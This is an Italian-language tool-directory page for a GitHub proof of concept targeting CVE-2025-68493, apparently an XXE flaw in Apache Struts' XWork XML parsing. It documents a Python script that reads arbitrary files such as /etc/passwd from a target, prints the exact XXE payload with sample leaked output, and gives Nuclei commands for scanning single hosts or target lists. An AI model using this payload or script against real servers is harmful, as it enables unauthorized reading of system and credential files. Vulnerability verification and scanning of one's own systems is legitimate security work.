Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68493 — CVE-2025-68493 | Kitploit
Strumenti/GitHubGitHub/hsltz/cve-2025-68493
Scanner di VulnerabilitàAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubhsltz/cve-2025-68493

CVE-2025-68493

CVE-2025-68493

Vedi Repository
26 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-68493

CVE-2025-68493

7. Riferimenti

[1] Vulnerabilità Apache Struts XWork XML CVE-2025-68493 PoC e script | ZONE.CI 全球网. https://zone.ci/secarticles/wx/486533.html

8. Verifica e sfruttamento della vulnerabilità

Per verificare e sfruttare la vulnerabilità CVE-2025-68493, è possibile utilizzare lo script Python PoC e il template YAML Nuclei forniti di seguito.

8.1 Come utilizzare lo script Python PoC

Nome dello script: cve_2025_68493_poc.py

Funzione: Questo script viene utilizzato per verificare la vulnerabilità su un singolo target, tentando di leggere un file specificato (predefinito: /etc/passwd).

Prerequisiti:

  • Ambiente Python 3
  • Libreria requests (pip install requests)

Parametri della riga di comando:

  • -u, --url: URL base dell'applicazione target (es: http://127.0.0.1:8080)
  • -f, --file: Percorso del file target da leggere (predefinito: /etc/passwd)

Esempio:

root@kitploit:~
python3 cve_2025_68493_poc.py -u http://example.com:8080 -f /etc/passwd

Output previsto:

Se il target è vulnerabile e la lettura del file ha successo, verrà mostrato un output simile al seguente:

root@kitploit:~
[*] Testing URL: http://example.com:8080/struts2-xml-parser/xmlParserNoDtdParse
[*] Payload: <?xml version="1.0"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd">]> <foo>&xxe;</foo>
[+] Vulnerable! Successfully read /etc/passwd
----------------------------------------
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
----------------------------------------

8.2 Come utilizzare il template YAML Nuclei

Nome del template: cve-2025-68493.yaml

Funzione: Questo template viene utilizzato per eseguire scansioni batch su più target con lo strumento Nuclei, al fine di rilevare la vulnerabilità CVE-2025-68493.

Prerequisiti:

  • Strumento Nuclei installato (si consiglia v3.x o superiore)

Parametri della riga di comando:

  • -t: Percorso del file template Nuclei
  • -u: URL singolo del target
  • -l: File contenente più URL target

Esempio:

Scansione di un singolo target:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -u http://example.com:8080

Scansione batch:

Supponiamo di avere un file chiamato targets.txt, in cui ogni riga contiene un URL target:

root@kitploit:~
http://target1.com:8080
http://target2.com:8080

Esegui il seguente comando per la scansione batch:

root@kitploit:~
nuclei -t cve-2025-68493.yaml -l targets.txt
Scarica lo strumento